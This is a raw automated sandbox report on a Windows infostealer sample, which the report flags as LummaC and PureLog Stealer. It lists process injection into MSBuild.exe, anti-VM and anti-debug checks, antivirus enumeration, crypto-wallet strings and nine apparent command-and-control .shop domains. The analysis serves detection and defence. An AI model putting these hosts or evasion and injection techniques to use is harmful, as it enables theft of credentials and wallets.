Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00401000	2_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004060E0	2_2_004060E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043B080	2_2_0043B080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00404090	2_2_00404090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00433230	2_2_00433230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00410290	2_2_00410290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004053B0	2_2_004053B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00429580	2_2_00429580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00403670	2_2_00403670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00406610	2_2_00406610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042170C	2_2_0042170C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00401730	2_2_00401730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042994F	2_2_0042994F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00424950	2_2_00424950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004269F8	2_2_004269F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00426A52	2_2_00426A52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00435C00	2_2_00435C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00421D7E	2_2_00421D7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043AD30	2_2_0043AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00407E30	2_2_00407E30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00408960 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00409050 appears 174 times
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: String function: 6CF69B35 appears 141 times
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: String function: 6CF6D520 appears 31 times
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: String function: 6CF690D8 appears 51 times

Source: 86KZvDaOZR.exe

Static PE information: invalid certificate

Source: 86KZvDaOZR.exe, 00000000.00000002.2025342206.00000000057B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs 86KZvDaOZR.exe
Source: 86KZvDaOZR.exe, 00000000.00000002.2018864715.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWindowsApp1.dll8 vs 86KZvDaOZR.exe
Source: 86KZvDaOZR.exe, 00000000.00000000.2009495788.0000000000182000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIntegralVideoRenderer.axP0 vs 86KZvDaOZR.exe
Source: 86KZvDaOZR.exe, 00000000.00000002.2017511456.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 86KZvDaOZR.exe
Source: 86KZvDaOZR.exe, 00000000.00000002.2025551735.00000000058A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs 86KZvDaOZR.exe
Source: 86KZvDaOZR.exe, 00000000.00000002.2018514045.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs 86KZvDaOZR.exe
Source: 86KZvDaOZR.exe, 00000000.00000002.2018864715.0000000004118000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWindowsApp1.dll8 vs 86KZvDaOZR.exe
Source: 86KZvDaOZR.exe, 00000000.00000002.2023803263.0000000005448000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWindowsApp1.dll8 vs 86KZvDaOZR.exe
Source: 86KZvDaOZR.exe	Binary or memory string: OriginalFilenameIntegralVideoRenderer.axP0 vs 86KZvDaOZR.exe

Source: 86KZvDaOZR.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_0042850D CoCreateInstance,

2_2_0042850D

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\86KZvDaOZR.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to behavior

Source: 86KZvDaOZR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 86KZvDaOZR.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 86KZvDaOZR.exe	ReversingLabs: Detection: 50%
Source: 86KZvDaOZR.exe	Virustotal: Detection: 59%

Source: unknown	Process created: C:\Users\user\Desktop\86KZvDaOZR.exe "C:\Users\user\Desktop\86KZvDaOZR.exe"
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe	Jump to behavior

Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 86KZvDaOZR.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 86KZvDaOZR.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 86KZvDaOZR.exe

Static file information: File size 3939792 > 1048576

Source: 86KZvDaOZR.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x389400

Source: 86KZvDaOZR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 86KZvDaOZR.exe, 00000000.00000002.2023803263.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, 86KZvDaOZR.exe, 00000000.00000002.2018864715.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, 86KZvDaOZR.exe, 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmp, 86KZvDaOZR.exe, 00000000.00000002.2018864715.0000000004118000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.0.dr
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: 86KZvDaOZR.exe, 00000000.00000002.2023803263.000000000537A000.00000004.08000000.00040000.00000000.sdmp, 86KZvDaOZR.exe, 00000000.00000002.2018864715.0000000003EBE000.00000004.00000800.00020000.00000000.sdmp, 86KZvDaOZR.exe, 00000000.00000002.2018864715.0000000004049000.00000004.00000800.00020000.00000000.sdmp

Source: 86KZvDaOZR.exe

Static PE information: 0x967729AC [Wed Dec 29 11:57:32 2049 UTC]

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Code function: 0_2_6CF1B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6CF1B6C0

Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF6CC2B push ecx; ret	0_2_6CF6CC3E
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF6D565 push ecx; ret	0_2_6CF6D578
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_00FF9AB0 push eax; mov dword ptr [esp], ecx	0_2_00FF9AB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00433113 push edi; ret	2_2_00433117
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043E488 push ebx; ret	2_2_0043E524
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043E514 push ebx; ret	2_2_0043E524
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043F66D pushfd ; iretd	2_2_0043F678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043EB40 push es; ret	2_2_0043EB43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00440DAF push ecx; iretd	2_2_00440DB6

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to dropped file

Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 86KZvDaOZR.exe PID: 7084, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Memory allocated: FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Memory allocated: 29B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Memory allocated: 49B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to dropped file

Source: C:\Users\user\Desktop\86KZvDaOZR.exe TID: 3208	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5900	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: MSBuild.exe, 00000002.00000002.2147863754.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: MSBuild.exe, 00000002.00000002.2147987348.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

API call chain: ExitProcess graph end node

graph_0-58646

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00437160 LdrInitializeThunk,

2_2_00437160

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Code function: 0_2_6CF6948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_6CF6948B

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Code function: 0_2_6CF1B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6CF1B6C0

Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF6948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6CF6948B
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF6B144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6CF6B144

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: 86KZvDaOZR.exe, 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: relaxtionflouwerwi.shop
Source: 86KZvDaOZR.exe, 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: deprivedrinkyfaiir.shop
Source: 86KZvDaOZR.exe, 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: detailbaconroollyws.shop
Source: 86KZvDaOZR.exe, 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: messtimetabledkolvk.shop
Source: 86KZvDaOZR.exe, 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: considerrycurrentyws.shop
Source: 86KZvDaOZR.exe, 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: understanndtytonyguw.shop
Source: 86KZvDaOZR.exe, 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: patternapplauderw.shop
Source: 86KZvDaOZR.exe, 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: horsedwollfedrwos.shop
Source: 86KZvDaOZR.exe, 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: corruptioncrackywosp.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43C000	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 453000	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9008	Jump to behavior

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

Jump to behavior

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Code function: 0_2_6CF684B0 cpuid

0_2_6CF684B0

Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Queries volume information: C:\Users\user\Desktop\86KZvDaOZR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Code function: 0_2_6CF6A25A GetSystemTimeAsFileTime,__aulldiv,

0_2_6CF6A25A

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 86KZvDaOZR.exe, type: SAMPLE
Source: Yara match	File source: 0.0.86KZvDaOZR.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2009495788.0000000000182000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe, 00000002.00000002.2147987348.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: MSBuild.exe, 00000002.00000002.2147987348.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: MSBuild.exe, 00000002.00000002.2147987348.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
